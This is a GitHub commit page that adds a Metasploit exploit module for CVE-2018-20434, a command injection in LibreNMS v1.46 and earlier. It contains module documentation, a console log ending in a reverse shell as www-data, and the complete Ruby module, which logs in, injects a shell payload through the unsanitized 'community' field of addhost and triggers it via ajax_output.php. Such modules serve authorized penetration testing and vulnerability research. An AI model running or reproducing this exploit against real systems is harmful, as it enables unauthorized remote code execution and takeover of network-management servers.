Skip to content
Permalink
Browse files

Land #11895, CVE-2018-20434 LibreNMS cmd injection exploit

  • Loading branch information...
jrobles-r7 committed Jun 4, 2019
2 parents 7366994 + c93c65c commit 9edf92434cabbce83414204c30acdc8d6cda675f
@@ -0,0 +1,65 @@
## Description

In LibreNMS `v1.46` and below, there exists a command injection vulnerability in `capture.inc.php`.
The vulnerable functionality is intended to run a command such as `snmpwalk` and save the output as
a file. The `community` parameter is an unsanitized parameter retrieved through a POST request to `addhost`,
and it is used to build the command that is executed in the `capture.inc.php` functionality. The final command
is passed to the `popen()` function, which results in execution of arbitrary code.

This module has been tested on LibreNMS `v1.46` and `v1.45`.

## Vulnerable Application

A [pre-built OVA](https://github.com/librenms/packer-builds/releases/tag/1.46) can be downloaded via a LibreNMS repo.

Additionally, vulnerable versions of LibreNMS for Ubuntu can be manually installed using the instructions [here](https://docs.librenms.org/Installation/Installation-Ubuntu-1804-Apache/).
In the command `composer create-project --no-dev --keep-vcs librenms/librenms librenms dev-master`, replace `dev-master` with a vulnerable version of the software, ex: `1.46`.

## Verification Steps

1. Install the application
2. Start msfconsole
3. Do: ```use exploit/linux/http/librenms_addhost_cmd_inject```
4. Do: ```set RHOSTS <ip>```
5. Do: ```set USERNAME <user>```
6. Do: ```set PASSWORD <pass>```
7. Do: ```run```
8. You should get a shell.

## Scenarios

### Tested on LibreNMS 1.46 on Ubuntu 18.04

```
msf5 > use exploit/linux/http/librenms_addhost_cmd_inject
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set rhosts 192.168.37.143
rhosts => 192.168.37.143
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set username blah
username => blah
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set password password
password => password
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > set lhost 192.168.37.1
lhost => 192.168.37.1
msf5 exploit(linux/http/librenms_addhost_cmd_inject) > run
[*] Started reverse TCP double handler on 192.168.37.1:4444
[*] Successfully logged into LibreNMS
[+] Successfully added device with hostname dFEzcH
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[+] Successfully deleted device with hostname dFEzcH and id #126
[*] Command: echo 38eJIFZsiRl3Er48;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "Trying: not found\r\nsh: 2: Connected: not found\r\nsh: 3: Escape: not found\r\n38eJIFZsiRl3Er48\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.37.1:4444 -> 192.168.37.143:55380) at 2019-05-29 15:26:02 -0500
whoami
www-data
uname -a
Linux ubuntu 4.18.0-15-generic #16~18.04.1-Ubuntu SMP Thu Feb 7 14:06:04 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
```
@@ -0,0 +1,163 @@
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = ExcellentRanking

include Exploit::Remote::HttpClient

def initialize(info = {})
super(update_info(info,
'Name' => 'LibreNMS addhost Command Injection',
'Description' => %q(
This module exploits a command injection vulnerability in the open source
network management software known as LibreNMS. The community parameter used
in a POST request to the addhost functionality is unsanitized. This parameter
is later used as part of a shell command that gets passed to the popen function
in capture.inc.php, which can result in execution of arbitrary code.
This module requires authentication to LibreNMS first.
),
'License' => MSF_LICENSE,
'Author' =>
[
'mhaskar', # Vulnerability discovery and PoC
'Shelby Pace' # Metasploit module
],
'References' =>
[
[ 'CVE', '2018-20434' ],
[ 'URL', 'https://shells.systems/librenms-v1-46-remote-code-execution-cve-2018-20434/' ],
[ 'URL', 'https://gist.github.com/mhaskar/516df57aafd8c6e3a1d70765075d372d' ]
],
'Arch' => ARCH_CMD,
'Targets' =>
[
[ 'Linux',
{
'Platform' => 'unix',
'DefaultOptions' => { 'Payload' => 'cmd/unix/reverse' }
}
]
],
'DisclosureDate' => '2018-12-16',
'DefaultTarget' => 0
))

register_options(
[
OptString.new('TARGETURI', [ true, 'Base LibreNMS path', '/' ]),
OptString.new('USERNAME', [ true, 'User name for LibreNMS', '' ]),
OptString.new('PASSWORD', [ true, 'Password for LibreNMS', '' ])
])
end

def login
login_uri = normalize_uri(target_uri.path, 'login')
res = send_request_cgi('method' => 'GET', 'uri' => login_uri)
fail_with(Failure::NotFound, 'Failed to access the login page') unless res && res.code == 200

cookies = res.get_cookies

login_res = send_request_cgi(
'method' => 'POST',
'uri' => login_uri,
'cookie' => cookies,
'vars_post' =>
{
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD']
}
)

fail_with(Failure::NoAccess, 'Failed to submit credentials to login page') unless login_res && login_res.code == 302

cookies = login_res.get_cookies
res = send_request_cgi('method' => 'GET', 'uri' => normalize_uri(target_uri.path), 'cookie' => cookies)
fail_with(Failure::NoAccess, 'Failed to log into LibreNMS') unless res && res.code == 200 && res.body.include?('Devices')

print_status('Successfully logged into LibreNMS. Storing credentials...')
store_valid_credential(user: datastore['USERNAME'], private: datastore['PASSWORD'])
login_res.get_cookies
end

def add_device(cookies)
add_uri = normalize_uri(target_uri.path, 'addhost')
@hostname = Rex::Text.rand_text_alpha(6...12)
comm_payload = "'; #{payload.encoded}#'"

res = send_request_cgi(
'method' => 'POST',
'uri' => add_uri,
'cookie' => cookies,
'vars_post' =>
{
'snmp' => 'on',
'force_add' => 'on',
'snmpver' => 'v2c',
'hostname' => @hostname,
'community' => comm_payload,
'authalgo' => 'MD5',
'cryptoalgo' => 'AES',
'transport' => 'udp',
'port_assoc_mode' => 'ifIndex'
}
)

fail_with(Failure::NotFound, 'Failed to add device') unless res && res.body.include?('Device added')
print_good("Successfully added device with hostname #{@hostname}")

host_id = res.get_html_document.search('div[@class="alert alert-success"]/a[@href]').text
fail_with(Failure::NotFound, "Couldn't retrieve the id for the device") if host_id.empty?
host_id = host_id.match(/(\d+)/).nil? ? nil : host_id.match(/(\d+)/)

fail_with(Failure::NotFound, 'Failed to retrieve a valid device id') if host_id.nil?

host_id
end

def del_device(id, cookies)
del_uri = normalize_uri(target_uri.path, 'delhost')
res = send_request_cgi(
'method' => 'POST',
'uri' => del_uri,
'cookie' => cookies,
'vars_post' =>
{
'id' => id,
'confirm' => 1
}
)

print_status('Unsure if device was deleted. No response received') unless res

if res.body.include?("Removed device #{@hostname.downcase}")
print_good("Successfully deleted device with hostname #{@hostname} and id ##{id}")
else
print_status('Failed to delete device. Manual deletion may be needed')
end
end

def exploit
exp_uri = normalize_uri(target_uri.path, 'ajax_output.php')
cookies = login

host_id = add_device(cookies)
send_request_cgi(
'method' => 'GET',
'uri' => exp_uri,
'cookie' => cookies,
'vars_get' =>
{
'id' => 'capture',
'format' => 'text',
'type' => 'snmpwalk',
'hostname' => @hostname
}
)

del_device(host_id, cookies)
end
end

0 comments on commit 9edf924

Please sign in to comment.
You can’t perform that action at this time.